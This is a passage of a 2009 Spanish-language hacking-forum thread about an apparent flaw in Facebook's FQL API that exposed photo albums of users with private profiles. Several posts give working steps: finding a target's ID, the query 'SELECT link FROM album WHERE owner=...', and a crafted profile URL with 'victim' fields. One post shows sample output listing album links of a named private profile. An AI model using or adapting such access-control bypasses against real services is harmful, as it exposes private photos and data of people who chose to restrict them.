elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  FQL Injection (?)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: FQL Injection (?)  (Leído 48,506 veces)
Littlehorse
All the world's a stage
Colaborador
***
Desconectado Desconectado

Mensajes: 2.714


Nie Dam Sie


Ver Perfil WWW
Re: FQL Injection (?)
« Respuesta #10 en: 15 Marzo 2009, 23:08 pm »

Claro, yo llego a lo mismo pero en Español XD
En línea

An expert is a man who has made all the mistakes which can be made, in a very narrow field.
Krackwar ™

Desconectado Desconectado

Mensajes: 100



Ver Perfil
Re: FQL Injection (?)
« Respuesta #11 en: 15 Marzo 2009, 23:10 pm »

Lo abran arreglado.
En línea

WHK es mas u17r4m4573r31337 que yo



El error mas grande de el mundo es decir que el ser humano es inteligente.

Facismo , antifacismo , etc.. la misma mierda ..
Soy el-> http://tinyurl.com/fantasma-de-krackwar
Código
  1. mov ecx,1000
  2. Etiqueta:
  3. invoke printf,"No Copiare en clases"
  4. loop Etiq
Littlehorse
All the world's a stage
Colaborador
***
Desconectado Desconectado

Mensajes: 2.714


Nie Dam Sie


Ver Perfil WWW
Re: FQL Injection (?)
« Respuesta #12 en: 15 Marzo 2009, 23:10 pm »

No, si funciona, lo acabo de probar  ;D

Saludos
En línea

An expert is a man who has made all the mistakes which can be made, in a very narrow field.
sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: FQL Injection (?)
« Respuesta #13 en: 15 Marzo 2009, 23:31 pm »

Pongan esto:
Código
  1. SELECT link FROM album WHERE owner=532437297
aca:
http://developers.facebook.com/tools.php

El link que sale es este:
http://www.facebook.com/album.php?aid=63080&id=532437297

Entran y ven el album.. necesitan tener cuenta en facebook.

Saludos!!
En línea

toxeek
The "Tricky" ..
Colaborador
***
Desconectado Desconectado

Mensajes: 1.636


Ver Perfil
Re: FQL Injection (?)
« Respuesta #14 en: 15 Marzo 2009, 23:38 pm »


Que tal.

A ver.. yo uso el Method photos.getAlbums.
Tras ello, en el callback pongo lo citado.

Pero este "bug" deberia de servir para aquellas personas que no son tus amigos, y tienen restricciones puestas para ver su album/perfil.
Mucho me temo que se este probando con personas con el perfil abierto.

Como digo, yo haciendolo asi recibo esa pagina de error..


Saludos.
En línea

"La envidia es una declaración de inferioridad"
Napoleón.
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: FQL Injection (?)
« Respuesta #15 en: 15 Marzo 2009, 23:46 pm »

El problema debe de estar aquí  :P
Esta url genera confusión, o bueno, a mi me la generó  :-X
http://www.facebook.com/profile.php?id=MIID&v=photos&viewas=MIID#/album.php?aid=yyyyyyy&id=MIID

Así esta mejor:
http://www.facebook.com/profile.php?id=IDUsuario&v=photos&viewas=MIID#/album.php?aid=yyyyyyy&id=IDUsuario

Al principio ponía Mi ID en todos los campos donde lo decía, pero resulta que el primero y el último son del usuario "victima", solo en el del medio hay que poner la nuestra, y si estaban haciendo esto les debería de decir que "no estaba disponible"  :P

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
toxeek
The "Tricky" ..
Colaborador
***
Desconectado Desconectado

Mensajes: 1.636


Ver Perfil
Re: FQL Injection (?)
« Respuesta #16 en: 15 Marzo 2009, 23:47 pm »

Que tal.

A ver, los que dicen que pueden, pueden hacer algo?
Busquen entre los amigos de sus amigos alguien que no tenga el hypervinculo activado en su nombre ( esto denotara que tiene impuestas restricciones para ver su perfil, y estos son los INTERESANTES ).
Tras ello pues hagan SOLO un click en su foto, y posen el puntero del raton sobre el link como para mandarles un mensaje.
Con el puntero posado, en la parte inferior ( informativa de links ) del Browser podremos obtener su ID.

Bien, tras ello hacemos todo el proceso con la API como se ha citado, para hacernos con el aid.

Pueden ver el album de esa persona??


Suerte.
En línea

"La envidia es una declaración de inferioridad"
Napoleón.
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: FQL Injection (?)
« Respuesta #17 en: 15 Marzo 2009, 23:49 pm »

Sip ... verdaderamente bueno ^_^ pero veo muchas opciones.. quizas tenga otras cosas para jugar  =D


^^
En línea

Experimental Serial Lain [Linux User]
sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: FQL Injection (?)
« Respuesta #18 en: 16 Marzo 2009, 00:06 am »

Miren, otro ejemplo:
http://www.facebook.com/profile.php?id=4 (el creador de facebook, perfil privado)

Código
  1. SELECT link FROM album WHERE owner=4

Código
  1. <?xml version="1.0" encoding="UTF-8"?>
  2.  
  3. <fql_query_response xmlns="http://api.facebook.com/1.0/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" list="true">
  4.  
  5.  <album>
  6.  
  7.    <link>http://www.facebook.com/album.php?aid=2204760&amp;id=4</link>
  8.  
  9.  </album>
  10.  
  11.  <album>
  12.  
  13.    <link>http://www.facebook.com/album.php?aid=2047231&amp;id=4</link>
  14.  
  15.  </album>
  16.  
  17.  <album>
  18.  
  19.    <link>http://www.facebook.com/album.php?aid=2034080&amp;id=4</link>
  20.  
  21.  </album>
  22.  
  23.  <album>
  24.  
  25.    <link>http://www.facebook.com/album.php?aid=2002684&amp;id=4</link>
  26.  
  27.  </album>
  28.  
  29. </fql_query_response>
  30.  
  31.  

Funciona ;)


Saludos!!
« Última modificación: 16 Marzo 2009, 00:11 am por sirdarckcat » En línea

sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: FQL Injection (?)
« Respuesta #19 en: 16 Marzo 2009, 00:09 am »

Ahhh ya vi su error XDDD

Estaban poniendo &amp; en el link jajaja.. deben cambiar &amp; por &, porque XML convierte chars como & a su entidad en HTML.

Saludos!!
En línea

Páginas: 1 [2] 3 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Sql injection
Nivel Web
TheAnswer 1 3,505 Último mensaje 11 Octubre 2004, 08:07 am
por Jec
SQL Injection
Nivel Web
Adept 4 4,305 Último mensaje 7 Diciembre 2004, 22:56 pm
por PaK0
una de sql-injection!!
Nivel Web
krispin 2 4,097 Último mensaje 29 Enero 2005, 05:22 am
por krispin
CAST EXEC en sql injection(Automated Sql Injection)
Nivel Web
EvilGoblin 2 4,955 Último mensaje 11 Julio 2010, 22:25 pm
por EvilGoblin
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines